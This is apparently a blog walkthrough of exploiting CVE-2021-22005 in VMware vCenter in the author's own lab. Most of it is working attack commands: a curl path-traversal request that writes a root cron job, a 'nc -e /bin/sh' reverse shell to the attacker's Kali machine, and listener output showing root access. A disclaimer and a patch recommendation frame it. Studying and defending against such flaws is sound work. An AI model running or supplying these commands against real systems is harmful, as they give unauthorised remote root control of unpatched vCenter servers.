Say what now? Another one!
VMware announced last week in its monthly security advisory VMSA-2021-0020.1 there is a specific vulnerability in vCenter server that allows for file upload and subsequent remote code execution.
The vulnerability is tracked as CVE-2021-22005 and has a score of 9.8 (very bad :p). It affects all version of VCSA 6.7 and 7.0 except the latest patched revisions. PoC code has been released publically on Twitter and AttackKB by user wvu.
So let’s fire up our lab and give it a go!
Disclaimer, I am attacking my own infrastructure, never do this without explicit permission.
You will need 1x VCSA install, i have 7.0 Vanilla with the CIEP enabled (customer experience agent).
1 x Kali Linux installed with the tools curl and ncat installed.
For the simplicity of the lab both VMs are on the same layer 2 LAN segment.
VCSA = 10.1.1.1, Kali = 10.1.1.2
Open a terminal on your Kali VM and configure a listener with ncat
ncat -lv 4444
Set up the directory for path traversal with curl:
curl -kv "https://10.1.1.1/analytics/telemetry/ph/api/hyper/send?_c=&_i=/$RANDOM" -H Content-Type: -d ""
Attack the target VCSA telling it to create a cron job and launch a reverse shell to your Kali VM:
curl -kv "https://10.1.1.1/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 10.1.1.2 4444"
Flip over to your ncat terminal:
└─$ ncat -lv 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.1.1.1.
Ncat: Connection from 10.1.1.1:43720
Lets check who we are?
uid=0(root) gid=0(root) groups=0(root),1000(vami),4044(shellaccess),59005(coredump)
Linux localhost 4.19.84-1.ph3 #1-photon SMP Tue Nov 19 00:44:01 UTC 2019 x86_64 GNU/Linux
Log files are not created with the above exploit, however json files are created which can be viewed with:
ls -l /var/log/vmware/analytics/prod/_c_i/*.json /etc/cron.d/*.json
rw-r--r-- 1 root root 49 Sep 29 13:34 /etc/cron.d/22240.json
-rw-r--r-- 1 root root 49 Sep 29 13:33 /etc/cron.d/27413.json
-rw-r--r-- 1 root root 0 Sep 29 12:17 /var/log/vmware/analytics/prod/_c_i/10284.json
-rw-r--r-- 1 root root 1 Sep 29 13:33 /var/log/vmware/analytics/prod/_c_i/12348.json
As per the VMSA the recommendation is to patch to 7.0u2c and 6.7u3o respectively.